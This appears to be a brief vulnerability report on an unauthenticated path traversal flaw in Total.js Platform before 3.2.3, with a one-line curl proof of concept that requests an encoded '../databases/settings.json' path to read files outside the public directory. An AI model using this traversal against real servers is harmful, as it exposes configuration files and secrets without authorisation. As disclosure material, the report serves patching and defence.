index.js in Total.js Platform before 3.2.3 allows path traversal.
Mad-robot at July 05, 2020 2:29pm UTC reported:
Totaljs – Unathenticated Directory Traversal
User can make requests like “GET /../databases/settings.json
HTTP/1.1” and include file contents from outside the /public
the directory which is the default directory for accessible static files.
PROOF OF CONCEPT
$ curl -v --path-as-is http://127.0.0.1:8000/.%2e/databases/settings.json
Assessed Attacker Value: 3
Assessed Attacker Value: 5